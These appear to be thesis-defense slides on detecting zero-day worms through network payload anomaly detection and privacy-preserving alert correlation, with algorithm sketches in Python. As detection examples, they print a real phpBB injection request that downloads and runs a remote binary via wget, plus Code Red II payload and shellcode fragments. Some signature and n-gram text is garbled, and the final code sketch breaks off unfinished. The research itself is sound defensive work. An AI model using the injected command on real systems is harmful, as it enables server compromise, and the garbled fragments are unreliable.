Network Payload-based Anomaly Detection and Content-based Alert Correlation
Ke Wang, Thesis Defense, Aug. 14th, 2006
Department of Computer Science, Columbia University

Why do we need payload-based anomaly detection?
- Attacks that appear to be normal connections may carry bad (anomalous) content indicative of a new exploit
- Slow and stealthy, or targeted/hitlist worms do not display the loud and obvious scanning or propagation behavior detectable via flow statistics
- This sensor augments other sensors and enriches the view of the network

Conjecture and Goal: Detect Zero-Day Exploits via Content Analysis
- A true zero-day attack will manifest as never-before-seen data delivered to an application or server
- Learn typical/normal data; detect abnormal data
- Generate a signature immediately to stop further propagation

- Worm propagation is detectable via flow statistics (except perhaps for slow worms)
- Targeted attacks are sophisticated and stealthy, with no loud and obvious propagation
- No need to wait for payload prevalence (a sufficient number of repeated occurrences of the same content)
- Goal: develop sensors that are accurate, efficient, and scalable, with resiliency to mimicry attacks

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection

- PAYL: 1-gram modeling
- Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites, and automatic signature generation

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- PAYL: 1-gram modeling

  - Statistical, semantics/language-independent, efficient
  - Incremental learning
  - Clustering for space saving
  - Multi-centroid fine-grained modeling
- Anagram: higher-order n-gram modeling
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites

Motivation for PAYL

- Content traffic to different ports has very different payload distributions
- Within one port, packets with different lengths also have different payload distributions
- Furthermore, worm/virus payloads are usually quite different from normal distributions
- Previous work:
  - Attack signatures: Snort, Bro
  - First few bytes of a packet: NATE, PHAD, ALAD
  - Service-specific IDS [CKrugel02]: coarse modeling, with the 256 ASCII characters in 6 groups

[Figure: example byte distributions for different ports (ssh, mail, web), for destination ports 22, 25, 80 and source ports 22, 25, 80]

[Figure: example byte distributions for different payload lengths of port 80 on the same host server]

[Figure: CR II byte distribution versus a normal distribution]

How to model normal content: the 1-gram centroid
- The average relative frequency of each byte, and the standard deviation of each byte's frequency, e.g., for payload length 185 on port 80

PAYL operation
- Learning phase

  - Models are computed incrementally from the packet stream, conditioned on port/service and packet length
  - Hands-free, epoch-based training
  - Clustering: merge two neighbouring centroids if their Manhattan distance is smaller than a threshold
    - Saves space, removes redundancy, linear-time computation
    - Improves modeling accuracy for length bins with little training data (sparseness)
  - Fine-grained multi-centroid modeling
- Self-calibration phase

  - Sampled training data sets an initial threshold
- Detection phase
  - Packets are compared against the models using the simplified Mahalanobis distance

Performance comparison: single centroid vs. multi-centroids
Test worms: CR, CRII, WebDAV, and the nsiislog.dll buffer overflow vulnerability (MS03-022)

False positive rates:

                                  Dataset W   Dataset W1   Dataset EX
  Single centroid                 0.66%       0.487%       0.982%
  Multi-centroids (one-pass)      0.42%       0.225%       0.32%
  Multi-centroids (semi-batched)  0.0086%     0.029%       0.107%

At a 0.1% false positive rate: 5.8 alerts/h for EX, 6 alerts/h for W, 8 alerts/h for W1

PAYL Summary

- Models: length-conditioned character frequency distribution (1-gram) and standard deviation of normal traffic
- Testing: Mahalanobis distance of the test packet against the model
- Pros: simple, fast, memory-efficient
- Cons:
  - Cannot capture attacks displaying a normal byte distribution
  - Easily fooled by mimicry attacks with proper padding
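As a concrete illustration of the model just summarized, here is a minimal Python sketch of a length-conditioned 1-gram centroid and the simplified Mahalanobis distance test. The class and function names are hypothetical, and the smoothing constant `alpha` (used to avoid division by zero when a byte's standard deviation is zero) is an assumption not shown on the slide.

```python
from collections import Counter

def byte_frequency(payload: bytes) -> list:
    """Relative frequency of each of the 256 byte values in a payload."""
    counts = Counter(payload)
    n = len(payload) or 1
    return [counts.get(b, 0) / n for b in range(256)]

class Centroid:
    """A PAYL-style centroid for one (port, payload-length) bin:
    running mean and standard deviation of byte frequencies."""
    def __init__(self):
        self.n = 0
        self.sum = [0.0] * 256    # running sum of frequencies
        self.sumsq = [0.0] * 256  # running sum of squared frequencies

    def train(self, payload: bytes):
        for i, f in enumerate(byte_frequency(payload)):
            self.sum[i] += f
            self.sumsq[i] += f * f
        self.n += 1

    def score(self, payload: bytes, alpha: float = 0.001) -> float:
        """Simplified Mahalanobis distance: sum_i |x_i - y_i| / (sigma_i + alpha)."""
        x = byte_frequency(payload)
        d = 0.0
        for i in range(256):
            mean = self.sum[i] / self.n
            var = max(self.sumsq[i] / self.n - mean * mean, 0.0)
            d += abs(x[i] - mean) / (var ** 0.5 + alpha)
        return d
```

A payload whose byte distribution deviates from the centroid (e.g., a sled of 0x90 bytes) scores far higher than a payload resembling the training traffic.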

Example: phpBB forum attack

GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:. (compatible;.MSIE.6.0;.Windows.NT.5.1;)..

- Relatively normal byte distribution, so PAYL misses it
- But the sequence of commands used for exploitation is abnormal: these are the attack invariants
- The subsequence of new, distinct byte values should be flagged as malicious
- What we need: capture the order dependence of byte sequences, i.e., higher-order n-gram modeling

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- PAYL: 1-gram modeling
- Anagram: higher-order n-gram modeling

  - Binary-based modeling
  - Bloom filters for space efficiency
  - Semi-supervised learning
  - Privacy-preserving payload alerts for correlation
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites

Overview of Anagram
- Binary-based higher-order n-gram modeling: model all the distinct n-grams appearing in the normal training data
- During testing, compute the fraction of never-seen distinct n-grams out of the total n-grams in a packet:

    Score = N_new / T,  Score in [0, 1]

- Semi-supervised learning:
  - Normal traffic is modeled
  - Prior known malicious traffic is also modeled: Snort rules, captured malcode
- The model is space-efficient through the use of Bloom filters
- Previous work:
  - Foreign system call sequences [Forrest96]

  - Trie-based n-gram storage and comparison for network anomaly detection [Rieck06]

[Figure: false positive rate (%) at 100% detection rate vs. training dataset length (in days), for 3-, 5-, and 7-grams. Normal traffic: real web traffic collected from two CUCS web servers. Test worms: CR, CRII, WebDAV, Mirela, the phpBB forum attack, and the nsiislog.dll buffer overflow (MS03-022)]

- Low false positive rate per packet (better per flow)
- No significant gain after 4 days of training
- Higher-order n-grams need longer training time to build a good model
- 3-grams are not long enough to distinguish malicious byte sequences from normal ones

[Figure: false positive rate (%) at 100% detection rate for different values of n, under both normal and semi-supervised training, for datasets www1-06 and www-06]

Mimicry attacks
- Attackers can easily evade the sensor by mimicking normal traffic and hiding the exploit inside the sled
- Example: the polymorphic mimicry worm developed by [OK05] targeting PAYL, which uses encoding and traffic blending to simulate the normal profile

Contributions

- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites

Randomization against mimicry attacks

- The general idea of payload-based mimicry attacks is to craft small pieces of exploit code with a large amount of normal padding, making the whole packet look normal
- If we randomly choose the payload portions used for modeling/testing, the attacker cannot know precisely which byte positions it must pad to appear normal, making it much harder to hide the exploit code
- This is a general technique that can be used with PAYL, Anagram, or any other payload anomaly detector
- For Anagram there is additional randomization: keep the n-gram size a secret!

Randomized Modeling
- Separate the whole packet randomly into several (possibly interleaved) substrings or subsequences S1, S2, ..., SN, and build one model for each
- A test packet's payload is divided accordingly
- Shortcomings:
  - Models from sub-partitions may be similar: higher memory consumption, no real model diversity
  - The test partitioning needs to be the same as the training partitioning: less flexibility, and retraining is needed whenever the partitions change

[Figure: the top plot is the model built from the whole packet; the bottom two are the models built from two random sub-partitions]

Randomized Testing
- A simpler strategy that does not incur substantial overhead: build one model for the whole packet, and randomize the tested portions
- Separate the whole packet randomly into several (possibly interleaved) partitions S1, S2, ..., SN, and score each randomly chosen partition separately
- Use the maximum score:

    Score = max_i (N_new^i / T_i)
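A minimal sketch of the chunked-random-mask idea, using an Anagram-style never-seen n-gram score as the per-partition test. All names here are hypothetical, and a plain Python set stands in for the Bloom filter model; the real sensors also condition on port and packet length.

```python
import random

def ngrams(data: bytes, n: int = 5):
    """All overlapping n-grams of a byte string."""
    return [data[i:i + n] for i in range(len(data) - n + 1)]

def anagram_score(data: bytes, model: set, n: int = 5) -> float:
    """Fraction of never-seen n-grams: N_new / T."""
    grams = ngrams(data, n)
    if not grams:
        return 0.0
    return sum(g not in model for g in grams) / len(grams)

def randomized_score(payload: bytes, model: set, parts: int = 4,
                     rng: random.Random = None) -> float:
    """Chunked random mask: cut the payload at random boundaries into
    `parts` contiguous chunks, score each chunk against the single
    whole-packet model, and return the maximum score.
    Assumes len(payload) > parts."""
    rng = rng or random.Random()
    cuts = sorted(rng.sample(range(1, len(payload)), parts - 1))
    bounds = [0] + cuts + [len(payload)]
    chunks = [payload[a:b] for a, b in zip(bounds, bounds[1:])]
    return max(anagram_score(c, model) for c in chunks)
```

An attacker who pads most of the packet with normal bytes can drive the whole-packet score down, but whichever chunk contains the exploit bytes still scores high, and the attacker cannot predict where the cuts fall.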

PAYL test on the mimicry attack designed by [OK05] to target it, with 20-fold randomized testing:

                       Detection times   Avg. FP   Std. FP
  Pure random mask     16/20             0.269%    0.375%
  Chunked random mask  14/20             0.175%    0.409%

Anagram test:

average false positive rate and standard deviation at 100% detection rate, with a chunked random mask and 10-fold randomized testing, under both normal and semi-supervised training

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
  - Detect slow or stealthy worms
  - Immediate signature generation
- Efficient privacy-preserving payload correlation across sites

Ingress/egress correlation to detect worm propagation

- An approach to stop a worm's very first propagation attempt
- Self-propagating worms will start attacking other machines (by sending at least the exploit portion of their content) shortly after a host is infected
- The attacked destination port will be the same, since the worm exploits the same vulnerability
- If we detect anomalous egress packets to port i that are very similar to anomalous ingress packets to port i, there is a high probability that a worm has started its propagation
- Advantage: can detect slow or stealthy worms that won't show probe behavior and thus evade probe detectors

Similarity metrics to compare the payloads of two or more anomalous packet alerts (C is the length of the common substring/subsequence; L1 and L2 are the two payload lengths):

  Metric                              Data used   Handles fragments   Similarity score [0, 1]   Detects metamorphic
  String equality (SE)                Raw data    No                  1 if equal, 0 otherwise   No
  Longest common substring (LCS)      Raw data    Yes                 2*C/(L1+L2)               No
  Longest common subsequence (LCSeq)  Raw data    Yes                 2*C/(L1+L2)               Some

LCS signature generation:

Code Red II:
|d0|[email protected]|0 ff|5|d0|[email protected]|0|h|d0| @|0|j|1|j|0|U|ff| 5|d8|[email protected]|0 e8 19 0 0 0 c3 ff|%`[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%| [email protected]|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXPLORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scripts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,217|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc

Previous Work
- Worm signature generation: Autograph, Earlybird, Honeycomb, Polygraph, Hamsa
- These detect frequently occurring payload substrings or tokens from suspicious IPs, which still depends on scanning behavior
- Detection occurs some time after the worm propagation begins
- They cannot detect slow and stealthy worms

Contributions
- Demonstrate the usefulness of analyzing network payload for anomaly detection
- Randomized modeling/testing that can help thwart mimicry attacks
- Ingress/egress payload correlation to capture a worm's initial propagation attempt
- Efficient privacy-preserving payload correlation across sites
  - Robust and privacy-preserving means of representing content-based alerts
  - Automatic signature generation

Cross-site payload alert correlation
- Each site has a distinct content flow
- Find global, common invariants in content

- If multiple sites see the same or similar content alerts, it is highly likely to be a true worm or targeted outbreak: separate TPs from FPs (the "false false positive" problem)
- Reduces false positives by creating white lists of those alerts that cannot be correlated
- A higher bar against mimicry attacks: diversity via content (not system or software), so exploit writers/attackers have to learn the distinct content traffic patterns of many different sites
- Needs to be privacy-preserving

Related Research
- DNAD/Worminator (slow/IP) sharing
- Domino alert sharing
- The model for content sharing and querying could also serve as a trap to detect attacker watermarking behavior
- PeerPressure, a privacy-preserving "friends" troubleshooting network

Correlation techniques
- Baseline: raw suspect-content string-based correlation: string equality (SE), longest common substring (LCS), longest common subsequence (LCSeq), edit distance (ED)
- Frequency-modeled 1-gram correlation:
  - Frequency distribution: Manhattan distance
  - Z-String: supports SE, LCS, LCSeq, ED
- Binary-modeled n-gram correlation: n-gram signature, Bloom filter n-gram signature

Example suspect content: "This is a bot command string"

- Original content: 256 bits
- List of 3-grams in the original string (25 n-grams; one n-gram appears twice in the original alert): Thi, sa, ot, mma, st, his, a, tc, man, str, is, ab, co, and, tri, si, bo, com, nd, rin, is, bot, omm, ds, ing
- Frequency distribution: the most frequent character is a space (ASCII code 32); size 8160 bits
- Z-String: isamnotTbcdghr plus the space, the most frequent character; non-appearing characters are removed; 15 characters = 120 bits
- Bloom filter of the above n-grams: if three hash values are used, the 25 n-grams take approximately 600 bits at a minimum optimal size

Real traffic evaluation
- Goal: measure performance in identifying true alerts among false positives
- Mix the collection of attacks into two hours of traffic from www and www1
- Ideal: true positives have very high similarity scores, while false positives have very low scores
- Multiple, differently-fragmented instances of Code Red and Code Red II simulate a real worm attack

- The mixed sets are run through PAYL and Anagram, with the alerting threshold reduced so that 100% of attacks are detected, at possibly higher FP rates

Real traffic evaluation (II)
[Figure: range of scores across multiple instances of the same worm (CR or CRII); range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism; and the false positive score range, where the blue bar represents the 99.9th percentile and white represents the maximum score. Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, ZStr-ED, and n-grams with n=5]

Real traffic evaluation (III)
- Correlation of identical (non-polymorphic) attacks works accurately for all techniques; non-fragmented attacks score near 1
- Z-Strings (MD, LCSeq, ED) and n-grams handle fragmentation well
- Polymorphism is hard to detect; only Raw-LCSeq and n-grams score well
- Overall, n-grams are particularly effective at eliminating false positives, and Bloom filters enable privacy preservation

Signature Generation
- Each class of techniques can generate its own signature
- Raw packets: exchange LCS/LCSeq (not privacy-preserving)
- Byte frequency/Z-Strings: given the frequency distribution, Z-Strings are generated by ordering bytes from most to least frequent and dropping the least frequent
- N-grams: robust to reordering or fragmentation; if position information is available, they can be flattened into a deployable string signature

Signature/Query generation (II)

Original CRII packet (first 300 bytes):
GET./default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u0

Z-String (first 20 bytes, ASCII values):
88 0 255 117 48 85 116 101 106 232 100 133 80 254 1 69 137 56 51

[Figure: byte frequency distribution]

Flattened 5-grams (first 172 bytes; * implies wildcard):
*/def*ult.ida?XXXX*XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HT*: 3379

Accuracy of the signatures
- The cumulative frequency of signature match scores computed by matching normal traffic against different worm signatures; the closer a curve is to the y-axis, the more accurate the signature

- The six curves represent, in order from left to right: 1) the n-gram signature, 2) the Z-String signature compared using LCS, 3) LCSeq of the raw signature, 4) the Z-String signature using LCSeq,

Signature for polymorphic worms
- Our approaches work poorly here, since they are based on payload similarity
- Will there be enough invariants for an accurate signature?
  - Slammer: first byte 0x04
  - CLET shellcode 2: \0xff\0xff\0xff and \0xeb\0x31
- Proposed alternative: a generalized signature specifying the higher-level pattern of an attack, instead of one based on raw payload:

    0xeb 0x31 {92 bytes, entropy: E} 0xff 0xff 0xff

Conclusions
- Network payload-based PAYL and Anagram can detect zero-day attacks with high accuracy and low false positives
- Randomization helps thwart mimicry attacks
- Ingress/egress correlation detects a worm's initial propagation and generates accurate worm signatures

  - Good at detecting slow/stealthy worms
- Privacy-preserving payload alert correlation across sites can identify true anomalies and reduce false positives
  - Accurate signature generation

Accomplishments

Major papers:
- Anagram: A Content Anomaly Detector Resistant to Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, Sept. 2006
- Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic Detection, J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept. 2006
- Anomalous Payload-based Worm Detection and Signature Generation, K. Wang, G. Cretu, S. Stolfo, RAID, Sept. 2005
- FLIPS: Hybrid Adaptive Intrusion Prevention, M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005
- Anomalous Payload-based Network Intrusion Detection, K. Wang, S. Stolfo, RAID, Sept. 2004

Software implementation (licensed by Columbia): PAYL sensor, Anagram sensor

Future Work
- Further evaluation, including measures/features of high-entropy partitions
- Optimization problems: model parameter settings (n-gram size, thresholds, etc.), random mask generation
- Real deployment of multiple-site correlation
- Shadow server architecture implementation and testing
- Pushing into the host: integration with instrumented application software

Thank you! Q/A?

Backup slides

Overview of PAYL: how it works
- Principles of operation: fine-grained modeling of normal payload
- Normal packet content is automatically learned, based upon unsupervised anomaly detection algorithms
- Site- and application-specific, also conditioned on packet length
- Build the byte frequency distribution and its standard deviation as the normal profile
- For test data, compute the simplified Mahalanobis distance against the centroid to measure similarity

Unsupervised Anomaly Detection: Core Technology
- Each site/host has a unique content flow that may be automatically learned

- UAD generates a model over unlabeled data; the model detects anomalies
- Computational approach: outlier detection
  - Anomalies in collected training data (forensics)
  - Anomalies in the data stream (detection)
- Two frameworks (geometric and probabilistic/statistical) and several algorithms
- PAYL is based upon comparison of content statistical distributions
- Handles noise in the data: no guarantees of attack-free data, but assumes most data is attack-free

Epoch-based learning
- Determines how much training data is enough, or whether the model is ready for use
- An epoch is measured in terms of the number of packets analyzed, or by means of a time period
- The training phase is sufficiently complete if the currently computed model has changed little for several consecutive epochs
- Need to define model similarity measurements

Epoch-based learning: PAYL
- Metric 1: the number of new centroids produced in the current epoch
- Metric 2: the Manhattan distance of each centroid to the nearest one computed in the prior epoch

Epoch-based learning: Anagram
- The likelihood of seeing new n-grams: the percentage of new distinct n-grams out of the total n-grams in this epoch

[Figure: likelihood of seeing new n-grams per 10,000 content packets, for 3-, 5-, and 7-grams]

[Figure: the computed Mahalanobis distances of normal and attack packets; the normal data's distances appear as several bands, which illustrates that we might want multiple centroids for one length]

Multiple-centroid modeling for each length

- Goal: build finer-grained models of the payload to detect anomalies more accurately
- Problems:
  - We don't know how many clusters may exist
  - We can only access each packet once, in sequence, and cannot store them all in memory
  - So traditional clustering algorithms like K-means and EM cannot easily be applied here
- Our solution: one-pass online clustering
- Improvement: semi-batched one-pass clustering (keep a small buffer and do locally optimal clustering)

Simplified Mahalanobis Distance
- The standard metric to compare two statistical distributions:

    d^2(x, y) = (x - y)^T C^{-1} (x - y),    C_ij = Cov(y_i, y_j)

  where x is the test data and y is its profile.
- When we assume each ASCII byte value is independent, the formula simplifies to:

    d(x, y) = sum_{i=0}^{n-1} |x_i - y_i| / sigma_i

Incremental Learning
- The average of N data points, and its update when the (N+1)th point arrives:

    xbar_N = (1/N) * sum_{i=1}^{N} x_i
    xbar_{N+1} = (N * xbar_N + x_{N+1}) / (N + 1)

- The standard deviation can be rewritten as:

    Var(X) = E(X - EX)^2 = E(X^2) - (EX)^2

- Therefore we don't need to keep previous data to update the average and standard deviation: each centroid stores only the averages of x and x^2

Manhattan distance

    Mdis(x, y) = sum_i |x_i - y_i|

[Figure: example of two distributions x and y over six bins, with Mdis(x, y) = 23]

Example of clustering across length bins
[Figure: original centroids vs. clustered centroids]

Self-calibration
- Training data is sampled; a FIFO keeps the most recent samples to capture concept drift
- After training, compute the distances of the samples against the centroid and set the anomaly threshold to the maximum
- At the start of the detection phase, increase the threshold by t% if the alert rate is higher than a user-specified parameter
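The incremental learning update described above (keeping only the running averages of x and x^2) can be sketched as follows; the class name is hypothetical.

```python
class IncrementalStats:
    """Running mean and standard deviation for one byte's frequency,
    storing only the averages of x and x^2, as on the slide."""
    def __init__(self):
        self.n = 0
        self.mean_x = 0.0   # running average of x
        self.mean_x2 = 0.0  # running average of x^2

    def update(self, x: float):
        self.n += 1
        # xbar_{N+1} = xbar_N + (x_{N+1} - xbar_N) / (N + 1)
        self.mean_x += (x - self.mean_x) / self.n
        self.mean_x2 += (x * x - self.mean_x2) / self.n

    @property
    def variance(self) -> float:
        # Var(X) = E(X^2) - (E X)^2
        return max(self.mean_x2 - self.mean_x ** 2, 0.0)

    @property
    def std(self) -> float:
        return self.variance ** 0.5
```

No history of past packets is needed: each centroid carries two numbers per byte value plus a count.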

One-pass online clustering algorithm

    while (more packets) {
        p = next packet;
        if (p is similar to one of the existing centroids)
            merge p into that centroid
        else
            create a new centroid with p as its center;
        if (total number of centroids > MaxSize)
            merge the two nearest ones
    }

Problem: the incoming order of the packets affects the result.

    merge(c_set1, c_set2) {
        for (each c in c_set1) {
            if (c is similar to one of the centroids in c_set2)
                merge c into that centroid
            else
                add c as a new centroid to c_set2
        }
        if (size of c_set2 > MaxNum)
            merge the two nearest ones until (size == MaxNum)
    }

Improvement: semi-batched one-pass clustering for stream processing
- Main idea: store the byte distributions of M packets, optimize the aggregate clustering of those M packets, then merge the resulting centroids into the existing centroids from the prior batch of data
- Can ameliorate the packet-ordering problem
- The batch size M needs to be chosen properly: a tradeoff between accuracy and memory consumption
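A runnable sketch of the one-pass clustering loop above, over byte-frequency vectors compared with Manhattan distance. The function names and the count-weighted merge rule are illustrative assumptions filled in for this sketch.

```python
def manhattan(x, y):
    """Manhattan distance: sum_i |x_i - y_i|."""
    return sum(abs(a - b) for a, b in zip(x, y))

def merge(c1, c2):
    """Count-weighted merge of two centroids (vector, count)."""
    (v1, n1), (v2, n2) = c1, c2
    return ([(a * n1 + b * n2) / (n1 + n2) for a, b in zip(v1, v2)], n1 + n2)

def one_pass_cluster(points, threshold, max_size):
    """One-pass online clustering, following the slide's pseudocode:
    merge each incoming point into the nearest centroid if within
    `threshold`, else start a new centroid; if there are more than
    `max_size` centroids, merge the two nearest ones."""
    centroids = []  # list of (mean_vector, count)
    for p in points:
        best = min(range(len(centroids)),
                   key=lambda i: manhattan(p, centroids[i][0]),
                   default=None)
        if best is not None and manhattan(p, centroids[best][0]) <= threshold:
            centroids[best] = merge(centroids[best], (list(p), 1))
        else:
            centroids.append((list(p), 1))
        if len(centroids) > max_size:
            i, j = min(((i, j) for i in range(len(centroids))
                        for j in range(i + 1, len(centroids))),
                       key=lambda ij: manhattan(centroids[ij[0]][0],
                                                centroids[ij[1]][0]))
            centroids[i] = merge(centroids[i], centroids[j])
            del centroids[j]
    return centroids
```

As the slides note, the result depends on the arrival order of the points, which is what the semi-batched variant mitigates.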

[Figure: one-pass clustering result, first six centroids for the W dataset, length 1460]

[Figure: semi-batch clustering result, first six centroids for the W dataset, length 1460]

Performance

- Training over 3 days of data, detection over 2 days; data from two web servers
- Training: 29 seconds (60 Mbits/sec); detection: 12 seconds (54 Mbits/sec)
- FP rate: 42 / 625595 packets (0.006%)
- Coverage: 20 of 30 known attacks in the data detected

Bloom filter
- A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient
- Represented as a bit vector; bit b is set if h_i(e) = b, where h_i is a hash function and e is the element in question
- No false negatives, although false positives are possible in a saturated BF via hash collisions; multiple hash functions are used for robustness
- Each n-gram is a candidate element to be inserted or verified in the BF
- Bloom filters are also privacy-preserving, since n-grams cannot be extracted from the resulting bit vector

Anagram: semi-supervised learning
- The binary-based approach is simple and efficient, but too sensitive to noisy data
- Pre-compute a "bad content" model using Snort rules and a collection of worm samples to supervise the learning

- This model should match very few normal packets, while being able to identify malicious traffic (often, new exploits reuse portions of old exploits)
- The model contains the distinct n-grams appearing in these malcode collections
- Use a small, clean dataset to exclude the normal n-grams that also appear in the Snort rules and viruses

[Figure: the bad content model: the n-grams in Snort rules and collected malware, minus the n-grams in clean traffic]

[Figure: distribution of bad-content matching scores for normal packets (left) and attack packets (right); the matching score is the percentage of a packet's n-grams that match the bad content model]

Use of the bad content model
- Training: ignore possibly malicious n-grams

  - Packets with more than a maximum number of n-grams matching the bad content model are ignored
  - Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
  - Ignoring a few packets is harmless for training
- Testing: scoring separates malicious from normal
  - If a never-seen n-gram also appears in the bad content model, give it a higher weight factor t (t = 5 in our experiments):

    Score = (N_new + t * N_new_bad) / T
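A minimal sketch tying together the Bloom filter model and the weighted score above. The filter parameters, the hash construction (SHA-256 with an index prefix), and all names are illustrative assumptions; the actual sensor's choices differ.

```python
import hashlib

class BloomFilter:
    """A minimal Bloom filter supporting only insert and verify.
    N-grams cannot be recovered from the bit vector, which is what
    makes it privacy-preserving when shared across sites."""
    def __init__(self, size_bits: int = 2 ** 16, num_hashes: int = 3):
        self.size = size_bits
        self.k = num_hashes
        self.bits = bytearray(size_bits // 8)

    def _positions(self, item: bytes):
        for i in range(self.k):
            h = hashlib.sha256(bytes([i]) + item).digest()
            yield int.from_bytes(h[:8], "big") % self.size

    def insert(self, item: bytes):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def contains(self, item: bytes) -> bool:
        return all(self.bits[pos // 8] >> (pos % 8) & 1
                   for pos in self._positions(item))

def weighted_score(payload: bytes, normal: BloomFilter,
                   bad: BloomFilter, n: int = 5, t: float = 5.0) -> float:
    """Score = (N_new + t * N_new_bad) / T: never-seen n-grams count 1,
    never-seen n-grams that also match the bad content model count t."""
    grams = [payload[i:i + n] for i in range(len(payload) - n + 1)]
    if not grams:
        return 0.0
    n_new = n_new_bad = 0
    for g in grams:
        if not normal.contains(g):
            if bad.contains(g):
                n_new_bad += 1
            else:
                n_new += 1
    return (n_new + t * n_new_bad) / len(grams)
```

A packet whose new n-grams also hit the bad content model is pushed well above the threshold, while purely unfamiliar but benign content scores lower.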

Feedback-based learning with shadow servers
- Training attacks: an attacker sends malicious data during training time to poison the model; the bad content model cannot guarantee 100% detection
- The most reliable way is to use the feedback of a host-based shadow server to supervise the training
- Also useful for adaptive learning to accommodate concept shift
- PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server: only a small percentage of all traffic is sent to the shadow server, instead of all of it
- The feedback of the shadow server can improve the accuracy of Anagram

[Figure: the structure of the mimicry worm]

The maximum possible padding length for a packet, for different varieties of this mimicry attack:

  Version         (418, 10)  (418, 100)  (730, 10)  (730, 10)  (730, 100)  (730, 100)
  Padding length  125        149         437        461        1167        1191

Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each. The second row gives the maximum number of bytes that can be used for padding in each packet.

Ingress/egress experimental setting

- Launched Code Red and Code Red II in our controlled test environment, captured the traces, and merged them into a real web server's trace
- This simulates a real worm attacking and propagating on a real server
- Interesting behavior observed about the worm: propagation occurred with packets fragmented differently than the initial attack packets, with multiple types of fragmentation

Different fragmentation for CR and CRII:

  Code Red (total 4039 bytes)
    Incoming:  1448, 1448, 1143
    Outgoing:  4, 13, 362, 91, 1460, 1460, 649
               4, 375, 1460, 1460, 740
               4, 13, 453, 1460, 1460, 649

  Code Red II (total 3818 bytes)
    Incoming:  1448, 1448, 922
    Outgoing:  1460, 1460, 898

Results of correlation for different metrics:

  Metric      Detects propagation   False alerts
  SE          No                    No
  LCS(0.5)    Yes                   No
  LCSeq(0.5)  Yes                   No

The number in parentheses is the threshold on the similarity score used to decide whether a propagation has occurred.

Data Diversity

[Figure: example byte distributions for payload length 536 of port 80 at the three sites]

PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distributions:

  Pair    Lengths           Distances
  EX, W   1448, 1460, 216   0.7896, 0.7851, 0.6241
  EX, W1  1460, 1448, 536   0.9746, 0.8731, 0.5540
  W, W1   892, 1460, 1448   0.7502, 0.7456, 0.7122

Anagram: the number of unique 5-grams in datasets W, W1, and EX, and the number of common 5-grams between each pair of sites:

  Dataset A    Dataset B     Common 5-grams  Common Perc(%)
  EX (509347)  W (953345)    129468          17.5%
  EX (509347)  W1 (974292)   99366           13.4%

Testing methodology
- Three sets of traffic, arranged into three sets of pairs

- www1 and www2: Columbia web servers, 100 packets each
- A malicious packet dataset, 56 packets each
- Known ground truth:
  - 10,000 good vs. good pairs
  - 1,540 bad vs. bad pairs
  - 5,600 good vs. bad pairs, between www1 and the malicious dataset
- Compare:
  - Similarity of the approaches
  - Effectiveness in correlating
  - Ability to generate signatures

Similarity: direct string comparison

[Figure: similarity scores for 80 random pairs of good vs. good packets, for Raw/ZStr ED, Raw/ZStr LCSeq, Raw/ZStr LCS, and Manhattan distance]

High-level view of score similarities:
- Most of the techniques are similar, except LCS (vulnerable to slight differences)
- ED and LCSeq are very similar
- N-gram techniques are not included (they don't compute similarity over the entire packet datagram)
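The LCSeq-based similarity score used throughout, 2*C/(L1+L2) with C the length of the longest common subsequence, can be sketched as follows; the function names are hypothetical.

```python
def lcseq_len(a: bytes, b: bytes) -> int:
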